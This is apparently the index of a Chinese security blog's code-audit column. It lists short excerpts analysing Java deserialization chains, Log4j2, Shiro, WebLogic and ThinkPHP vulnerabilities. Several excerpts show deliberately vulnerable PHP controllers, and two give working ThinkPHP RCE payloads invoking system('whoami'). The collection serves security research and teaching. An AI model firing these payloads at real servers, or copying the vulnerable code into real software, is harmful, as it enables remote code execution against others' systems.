![](https://img-blog.csdnimg.cn/20190927151117521.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
代码审计
文章平均质量分 83
1
0x6b79
!
展开
-
java-tomcat-filter内存马
java内存马原创 2021-12-31 20:41:18 · 759 阅读 · 0 评论 -
Log4j2_RCE漏洞
前端时间爆出的Log4j2_RCE漏洞可谓是让安全圈提前过年,今天来复现和简单分析下这个漏洞!原创 2022-01-01 16:29:46 · 1934 阅读 · 1 评论 -
WebLogic CVE-2020-14645分析
WebLogic CVE-2020-14645分析原创 2021-12-10 19:37:21 · 628 阅读 · 0 评论 -
WebLogic CVE-2020-2555分析
WebLogic CVE-2020-2555分析原创 2021-12-10 16:24:10 · 3513 阅读 · 0 评论 -
restart h2 database query RCE复现
restart h2 database query RCE复现原创 2021-12-09 20:03:15 · 3082 阅读 · 0 评论 -
jolokia Realm JNDI RCE分析
jolokia Realm JNDI RCE分析原创 2021-12-09 19:22:12 · 2543 阅读 · 0 评论 -
eureka xstream deserialization RCE复现
eureka xstream deserialization RCE复现原创 2021-12-08 21:08:58 · 848 阅读 · 0 评论 -
spring cloud SnakeYAML RCE
spring cloud SnakeYAML RCE原创 2021-12-08 20:49:19 · 919 阅读 · 0 评论 -
jolokia logback JNDI RCE
jolokia logback JNDI RCE漏洞分析原创 2021-12-08 10:35:17 · 1422 阅读 · 0 评论 -
SpringBoot SpEL RCE漏洞分析
SpringBoot SpEL RCE前言最近一段时间学习Spring系列的漏洞,跟着Github上的资源学习原创 2021-12-07 11:33:17 · 1855 阅读 · 0 评论 -
CVE-2019-12422 Shiro721反序列化漏洞
CVE-2019-12422 Shiro721反序列化漏洞前面分析了Shiro550,导致Shrio550漏洞的原因是Shiro存在默认key,当服务器端的默认key没有修改,则攻击者可以利用这个默认key进行传输任意的rememberMe字段Cookie,这个rememberMe字段Cookie传输到服务器端之后会被反序列化!而在shiro1.2.5及以后的版本怎么利用呢?原创 2021-12-06 22:06:35 · 2842 阅读 · 0 评论 -
JDBC反序列化初步学习
JDBC反序列化初步学习当在JDBC连接数据库的URL可控,且服务器存在可以利用的反序列化链,这时就可能存在反序列化漏洞原创 2021-12-06 15:31:24 · 1166 阅读 · 0 评论 -
Fastjson_1.22-1.24漏洞分析
Fastjson_1.22-1.24漏洞分析Fastjson是一个库,可以将java对象转换为json字符串,也可以将json字符串转换为java对象。Fastjson简单使用Fastjson通过 toJSONString 方法把java对象转换为 json 字符串,通过 parse/parseObject 把json字符串转换为java对象,简单看个例子理解它们的区别原创 2021-12-06 10:15:35 · 445 阅读 · 0 评论 -
JNDI注入学习
JNDI注入简单记录一下学习JNDI时学习到的知识点JNDI是什么?前面我们学习过RMI远程方法调用,那是一个RMI SERVER - RMI Client的结构,而 JNDI 也可以从RMI SERVER中获取到对象并执行其中的方法。那么这两者有什么区别呢?原创 2021-12-05 20:46:30 · 1415 阅读 · 0 评论 -
JDK7u21原生反序列化链分析
JDK7u21原生反序列化链分析前面分析的都是第三方的反序列化链,那么有没有JDK原生的反序列化链呢?答案是有的,JDK7u21 和 JDK8u20就是两条原生的反序列化链!原创 2021-12-05 12:04:15 · 849 阅读 · 0 评论 -
CommonsBeanutils1反序列化链在Shiro中的利用
CommonsBeanutils1反序列化链在Shiro中的利用前面分析Shiro550的时候,利用的是commons-collections进行构造反序列化链,但是commons-collections是我们手动加进去的,如果Shiro没有commons-collections链呢,这时候该怎么办?这时候CommonsBeanutils1反序列化链就派上用场了!Shiro是默认依赖Commons-Beanutils1.8.3的,那么就可以利用CommonsBeanutils1反序列化链进行构造pa原创 2021-12-04 23:16:28 · 971 阅读 · 0 评论 -
CommonsBeanutils1反序列化链分析
CommonsBeanutils1反序列化链分析原创 2021-12-04 22:42:42 · 927 阅读 · 0 评论 -
Shiro550漏洞分析
Shiro550漏洞分析环境JDK8shiro1.2.4commons-collections-3.2.1漏洞原理Shiro安全框架登录时提供记住我功能,当登录时开启记住我功能时返回包会携带一个Cookie字段,键为rememberMe,下次登陆的时候携带返回包的Cookie进行,服务器端会把这个Cookie进行解码后反序列化。客户端用rememberMe功能时,服务器端会把Cookie数据进行序列化,然后进行AES加密,再Base64编码,最后以rememberMe为键返回给客户端。当客户原创 2021-12-04 21:05:44 · 277 阅读 · 0 评论 -
java_ClassLoader学习
java_ClassLoader学习ClassLoader是什么?引用网上的解释,很通俗易懂一个完整的 Java 应用程序由若干个 Java Class 文件组成,当程序在运行时,会通过一个入口函数来调用系统的各个功能,这些功能都被存放在不同的 Class 文件中。因此,系统在运行时经常会调用不同 Class 文件中被定义的方法,如果某个 Class 文件不存在,则系统会抛出 ClassNotFoundException 异常。系统程序在启动时,不会一次性加载所有程序要使用的 Class 文件到内原创 2021-12-03 20:58:53 · 213 阅读 · 0 评论 -
apache-commons-collections7反序列化链分析
apache-commons-collections7反序列化链分析apache-commons-collections7反序列化链也是对ACC1链的变形利用罢了,倒是其中涉及一些hash知识复现环境JDK7+CommonsCollections1前景知识这里要在前面说一下的是Hashtable.put方法新增的元素,是存储在Hashtable$Entry这个内部类里面的,那么获取元素也是在这个内部类获取的,这个跟进一下Hashtable.put方法就能知道LazyMap.put方法新增的元素,原创 2021-12-02 23:47:01 · 228 阅读 · 0 评论 -
apache-commons-collections6反序列化链分析
apache-commons-collections6反序列化链分析apache-commons-collections6反序列化链利用的也是通过TiedMapEntry.getValue方法调用一系列的transform方法执行系统命令的,下面就分析分析这条链复现环境JDK7+CommonsCollections1漏洞分析看到CommonsCollections6类的getObject方法,前面是很熟悉的Transformer数组构造,数组构造和ACC5也是一样的,这里直接在实例化Chained原创 2021-12-02 19:01:20 · 418 阅读 · 0 评论 -
apache-commons-collections5反序列化链分析
apache-commons-collections5反序列化链分析apache-commons-collections5反序列化链就是ACC1 LazyMap攻击链的利用,都是学过的知识点复现环境JDK7+CommonsCollections1漏洞分析看到CommonsCollections5类的getObject方法,实例化transformerChain类,并进行占位,后面再反射赋值为Transformer数组,Transformer数组很熟悉,构造跟ACC1链一样,Transform原创 2021-12-02 16:26:54 · 723 阅读 · 0 评论 -
apache-commons-collections4反序列化链分析
apache-commons-collections4反序列化链分析apache-commons-collections4反序列化链是ACC2和ACC3链的组合,没用到啥新的知识点,分析过ACC2和ACC3链的应该比较简单复现环境JDK7+CommonsCollections4漏洞分析看到CommonsCollections4类的getObject方法,同样的生成恶意的TemplatesImpl对象然后实例化ConstantTransformer对象并用String.class进行占位,后面再原创 2021-12-02 12:37:58 · 518 阅读 · 0 评论 -
apache-commons-collections3反序列化链分析
apache-commons-collections3反序列化链分析调试环境JDK7+commons-collections-3.1.jarapache-commons-collections3反序列化链其实利用的地方跟ACC1链一样,只是构造payload的方法有所不同罢了,apache-commons-collections3反序列化链的payload构造利用到了apache-commons-collections1、apache-commons-collections3反序列化链构造的知识点下原创 2021-12-01 22:11:18 · 302 阅读 · 0 评论 -
apache-commons-collections2反序列化链分析
apache-commons-collections2反序列化链分析在审计完apache-commons-collections1反序列化链之后,继续审计apache-commons-collections系列的反序列化链,下面根据ysoserial工具生成CommonsCollections2反序列化链payload的思路一步步分析前景知识ysoserial工具生成payload的时候用到了动态生成类和PriorityQueue队列,之前也没接触过,下面简单记录一下JAVAssite动态生成类百原创 2021-12-01 19:09:47 · 671 阅读 · 0 评论 -
apache-commons-collections1反序列化链分析
apache-commons-collections1反序列化链分析调试环境commins-collections3.1JDK7漏洞分析在InvokerTransformer类中的transform方法存在一组反射方法执行只要能控制参数input、iMethodName、iParamTypes和iArgs,就能调用Runtime.exec执行系统命令!iMethodName、iParamTypes和iArgs是通过构造方法赋值,很明显其值可控现在要让input参数可控并且为Runtime对原创 2021-11-30 22:05:26 · 441 阅读 · 0 评论 -
ThinkPHP6.0.1_反序列化漏洞分析
ThinkPHP6.0.1_反序列化漏洞分析ThinkPHP6.0.0-ThinkPHP6.0.1漏洞代码<?phpnamespace app\controller;use app\BaseController;class Index extends BaseController{ public function index(){ $data = $_POST['data']; unserialize(base64_decode($data));原创 2021-11-29 00:14:38 · 551 阅读 · 0 评论 -
ThinkPHP6.0.1_任意文件写入漏洞分析
ThinkPHP6.0.1_任意文件写入漏洞分析ThinkPHP6.0.0-ThinkPHP6.0.1漏洞代码<?phpnamespace app\controller;use app\BaseController;class Index extends BaseController{ public function index(){ $a = $_GET['a']; $b = $_GET['b']; session($a,$b);原创 2021-11-29 00:13:54 · 808 阅读 · 0 评论 -
ThinkPHP5.0.9_SQL注入漏洞分析
ThinkPHP5.0.9_SQL注入漏洞分析ThinkPHP5.0.9漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $id = input('id/a'); $data = db('users')->where('id','in',$id)->select(); dump($data); }}PO原创 2021-11-28 23:41:06 · 992 阅读 · 0 评论 -
ThinkPHP5.0.10_parseWhereItem导致的SQL注入漏洞分析
ThinkPHP5.0.10_parseWhereItem导致的SQL注入漏洞分析ThinkPHP5.0.10漏洞代码<?phpnamespace app\index\controller;class Index{ public function test01(){ $username = request()->get('username/a'); $result = db('users')->where(['username' =>原创 2021-11-28 23:33:35 · 578 阅读 · 1 评论 -
ThinkPHP5.1.17_parseArrayDate函数导致的SQL注入漏洞分析
ThinkPHP5.1.17_parseArrayDate函数导致的SQL注入漏洞分析ThinkPHP5.1.16-ThinkPHP5.1.17(非最新版的5.1.18版本也可利用漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $username = request()->get('username/a'); db('users')-&g原创 2021-11-28 23:19:00 · 140 阅读 · 0 评论 -
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析ThinkPHP5.0.13-ThinkPHP5.0.15/ThinkPHP5.1.0-ThinkPHP5.1.5漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $username = request()->get('username\a'); db('users')-原创 2021-11-28 22:41:13 · 1144 阅读 · 0 评论 -
ThinkPHP5.1.22_order by注入
ThinkPHP5.1.22_order by注入ThinkPHP5.1.16-ThinkPHP5.1.22漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $orderby = request()->get('orderby'); $result = db('users')->where(['username' => 'adm原创 2021-11-28 22:36:04 · 888 阅读 · 0 评论 -
ThinkPHP5.1.25_聚合函数的SQL注入分析
ThinkPHP5.1.25_聚合函数的SQL注入分析ThinkPHP5.0.0-ThinkPHP5.0.21/ThinkPHP5.1.3-ThinkPHP5.1.25漏洞代码<?phpnamespace app\index\controller;class Index{ public function index(){ $options = request()->get('options'); $result = db('users')-&g原创 2021-11-28 22:30:41 · 694 阅读 · 0 评论 -
ThinkPHP5.0.18_文件包含漏洞分析
ThinkPHP5.0.18_文件包含漏洞分析ThinkPHP5.0.0-ThinkPHP5.0.18/ThinkPHP5.1.0-ThinkPHP5.1.10漏洞代码<?phpnamespace app\index\controller;use think\Controller;class Index extends Controller{ public function index(){ $this->assign(request()->get()原创 2021-11-28 22:22:12 · 457 阅读 · 0 评论 -
ThinkPHP_cache缓存函数代码执行漏洞
ThinkPHP_cache缓存函数代码执行漏洞ThinkPHP3.2.3-ThinkPHP5.0.10漏洞代码<?phpnamespace app\index\controller;use think\Cache;class Index{ public function test01(){ Cache::set("name",input("get.username")); return "Cache success"; }}p原创 2021-11-21 12:15:14 · 783 阅读 · 0 评论 -
ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析
ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析ThinkPHP5.0.24漏洞代码<?phpnamespace app\index\controller;class Index{ public function test01(){ $code = $_POST['code']; unserialize(base64_decode($code)); }}payload/index.php/index/index/t原创 2021-11-21 12:00:39 · 4528 阅读 · 1 评论 -
ThinkPHP5.1.37_从反序列化到RCE
ThinkPHP5.1.37_从反序列化到RCEThinkPHP5.1.37漏洞代码<?phpnamespace app\index\controller;class Index{ public function test01(){ $b = $_POST['code']; unserialize(base64_decode($b)); }}POC/index.php/index/index/test01?ky=whoamiPOS原创 2021-11-21 11:53:17 · 1009 阅读 · 0 评论 -
ThinkPHP未开启强制路由导致RCE
未开启强制路由导致RCE对TP5.0.5的RCE分析ThinkPHP5.0.5payload/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami未开启强制路由,并开启兼容模式漏洞分析先进入App::run方法,然后前面那些获取默认语言啥的代码不用管,再获取$dispatch变量,此变量为空进而调用rout原创 2021-11-21 11:49:23 · 515 阅读 · 0 评论 -
ThinkPHP5.0.5_变量覆盖导致的RCE漏洞分析
TP5.0.5_变量覆盖导致的RCE漏洞分析TP的RCE漏洞有两个大版本的区别TP 5.0-5.0.24 这个RCE在5.0.13之后的版本需要开启debug模式TP 5.1.0-5.1.30POChttp://localhost:8009/public/index.phpPOST:_method=__construct&method=GET&filter[]=system&s=whoami漏洞分析在经过App::routeCheck()->Ro原创 2021-11-21 11:40:12 · 1428 阅读 · 0 评论